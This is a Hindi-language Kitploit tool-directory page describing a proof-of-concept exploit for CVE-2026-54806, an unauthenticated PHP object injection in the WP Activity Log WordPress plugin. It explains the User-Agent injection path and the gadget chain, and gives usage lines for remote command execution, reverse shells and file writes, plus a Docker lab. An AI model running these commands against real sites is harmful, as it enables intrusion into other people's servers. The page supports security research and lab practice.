Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-54806 — CVE-2026-54806 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: WP Activity Log प्लगइन में अनधिकृत PHP ऑब्जेक्ट इंजेक्शन जो User-Agent हेडर के माध्यम से ब्लाइंड RCE सक्षम करता है। भेद्यता जाँच, कमांड निष्पादन, रिवर्स शेल, और फ़ाइल लेखन सुविधाओं के साथ एक स्व-निहित Docker लैब शामिल है। | Kitploit
उपकरण/GitHubGitHub/joshuavanderpoll/cve-2026-54806
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूलपेलोड डेवलपमेंटलैब और अभ्यास
GitHub
joshuavanderpoll/cve-2026-54806

CVE-2026-54806

CVE-2026-54806 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: WP Activity Log प्लगइन में अनधिकृत PHP ऑब्जेक्ट इंजेक्शन जो User-Agent हेडर के माध्यम से ब्लाइंड RCE सक्षम करता है। भेद्यता जाँच, कमांड निष्पादन, रिवर्स शेल, और फ़ाइल लेखन सुविधाओं के साथ एक स्व-निहित Docker लैब शामिल है।

रिपॉजिटरी देखें
54163 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

WP Activity Log PHP ऑब्जेक्ट इंजेक्शन (CVE-2026-54806) PoC

Python

📜 विवरण

CVE-2026-54806, WP Activity Log वर्डप्रेस प्लगइन (wp-security-audit-log) में Melapress द्वारा एक गंभीर (CVSS 9.8) अनप्रमाणित PHP ऑब्जेक्ट इंजेक्शन भेद्यता है। एक अनप्रमाणित हमलावर किसी भी अनुरोध पर User-Agent हेडर के माध्यम से सीरियलाइज़्ड PHP ऑब्जेक्ट इंजेक्ट कर सकता है जो एक लॉग इवेंट (जैसे असफल लॉगिन) को ट्रिगर करता है। इंजेक्ट किया गया पेलोड डेटाबेस में संग्रहीत होता है और जब कोई व्यवस्थापक वर्डप्रेस डैशबोर्ड पर जाता है तो बिना किसी प्रतिबंध के डिसीरियलाइज़ हो जाता है, जिससे ब्लाइंड रिमोट कोड एक्जीक्यूशन (हमलावर को कोई आउटपुट वापस नहीं आता) होता है।

प्रभावित प्लगइन: WP Activity Log <= 5.6.3.1 (5.6.4 में ठीक किया गया)

RCE के लिए आवश्यक: WordPress 6.4.0 - 6.4.1 — यह PoC WP_HTML_Token गैजेट का उपयोग करता है, जो एकमात्र WP कोर चेन है जिसमें सभी सार्वजनिक गुण हैं जो sanitize_text_field() से बच जाते हैं और 255-अक्षर कॉलम सीमा में फिट होते हैं।

✨ विशेषताएँ

  • भेद्यता जांच — --check के माध्यम से गैर-विनाशकारी पहचान
  • कमांड निष्पादन — --command के माध्यम से कमांड इंजेक्ट करें
  • रिवर्स शेल — --shell के माध्यम से रिवर्स शेल इंजेक्ट करें
  • फ़ाइल लिखें — --write-file के माध्यम से फ़ाइलें लिखें
  • प्रमाणीकरण की आवश्यकता नहीं — पेलोड असफल लॉगिन User-Agent के माध्यम से इंजेक्ट किया गया
  • ब्लाइंड RCE — कोई कमांड आउटपुट वापस नहीं आता; इंटरैक्शन के लिए रिवर्स शेल या फ़ाइल लिखें का उपयोग करें

🛠️ स्थापना

OSX/Linux

git clone https://github.com/joshuavanderpoll/CVE-2026-54806.git
cd CVE-2026-54806
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt

Windows

git clone https://github.com/joshuavanderpoll/CVE-2026-54806.git
cd CVE-2026-54806
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt

⚙️ उपयोग

python3 cve-2026-54806.py -t <target> --check
python3 cve-2026-54806.py -t <target> --command <cmd>
python3 cve-2026-54806.py -t <target> --shell --lhost <ip> --lport <port>
python3 cve-2026-54806.py -t <target> --write-file <content> <path>

🐋 Docker PoC

WordPress 6.4.1 + WP Activity Log 5.6.3.1 के साथ स्व-निहित प्रयोगशाला। विवरण के लिए DOCKER.md देखें।

cd docker
docker compose up -d
python3 cve-2026-54806.py -t http://localhost:8080 --check

प्रयोगशाला में एक admin-bot शामिल है जो हर 60 सेकंड में डैशबोर्ड पर जाता है, इसलिए इंजेक्ट किए गए पेलोड स्वचालित रूप से फायर होते हैं — किसी मैन्युअल इंटरैक्शन की आवश्यकता नहीं है।

🕵🏼 संदर्भ

  • WP Activity Log — Melapress
  • NVD — CVE-2026-54806
  • Patchstack — CVE-2026-54806

📢 अस्वीकरण

यह उपकरण केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। निर्माता इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।

टूल डाउनलोड करें